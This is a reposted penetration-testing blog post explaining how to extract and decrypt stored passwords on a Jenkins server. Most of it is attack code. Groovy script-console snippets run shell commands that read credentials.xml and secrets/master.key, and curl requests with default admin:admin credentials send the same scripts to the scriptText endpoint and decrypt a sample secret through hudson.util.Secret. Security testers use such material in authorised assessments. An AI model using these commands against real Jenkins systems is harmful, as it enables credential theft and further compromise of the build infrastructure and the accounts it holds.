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Jenkins – decrypting credentials.xml Carnal0wnage – Blog Carnal0wnage Blog

Jenkins – decrypting credentials.xml

If you find yourself on a Jenkins box with script console access you can decrypt the saved passwords in credentials.xml in the following way:


passwd = hudson.util.Secret.decrypt(hashed_pw)

You need to perform this on the the Jenkins system itself as it’s using the local master.key and hudson.util.Secret

Screenshot below

Code to get the credentials.xml from the script console


def sout = new StringBuffer(), serr = new StringBuffer()
def proc=”cmd.exe /c type credentials.xml”.execute()
proc.consumeProcessOutput(sout, serr)
println “out> $sout err> $serr”


def sout = new StringBuffer(), serr = new StringBuffer()
def proc=”cat credentials.xml”.execute()
proc.consumeProcessOutput(sout, serr)
println “out> $sout err> $serr”

If you just want to do it with curl you can hit the scriptText endpoint and do something like this:


curl -u admin:admin –data “script=def+sout+%3D+new StringBuffer(),serr = new StringBuffer()%0D%0Adef+proc+%3D+%27cmd.exe+/c+type+credentials.xml%27.execute%28%29%0D%0Aproc.consumeProcessOutput%28sout%2C+serr%29%0D%0Aproc.waitForOrKill%281000%29%0D%0Aprintln+%22out%3E+%24sout+err%3E+%24serr%22&Submit=Run”

Also because this syntax took me a minute to figure out for files in subdirectories:

curl -u admin:admin –data “script=def+sout+%3D+new StringBuffer(),serr = new StringBuffer()%0D%0Adef+proc+%3D+%27cmd.exe+/c+type+secrets%5C\master.key%27.execute%28%29%0D%0Aproc.consumeProcessOutput%28sout%2C+serr%29%0D%0Aproc.waitForOrKill%281000%29%0D%0Aprintln+%22out%3E+%24sout+err%3E+%24serr%22&Submit=Run


curl -u admin:admin –data “script=def+sout+%3D+new StringBuffer(),serr = new StringBuffer()%0D%0Adef+proc+%3D+%27cat+credentials.xml%27.execute%28%29%0D%0Aproc.consumeProcessOutput%28sout%2C+serr%29%0D%0Aproc.waitForOrKill%281000%29%0D%0Aprintln+%22out%3E+%24sout+err%3E+%24serr%22&Submit=Run”

Then to decrypt any passwords:

curl -u admin:admin –data “script=println(hudson.util.Secret.fromString(‘7pXrOOFP1XG62UsWyeeSI1m06YaOFI3s26WVkOsTUx0=’).getPlainText())”

If you are in a position where you have the files but no access to jenkins you can use:

There is a small bug in the python when it does the regex and i havent bothered to fix it at the time of this post. But here is version where instead of the regex i’m just printing out the values and you can see the decrypted password. The change is line 55.

Edit 4 March 19: the script only regexs for password (line 72), you might need to swap out the regex if there are ssh keys or other secrets…read the credentials.xml file 🙂

Edit 8 April 19: This tweet outlines another similar way  

More/Source: https://blog.carnal0wnage.com/2019/02/jenkins-decrypting-credentialsxml.html

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By Intelwar

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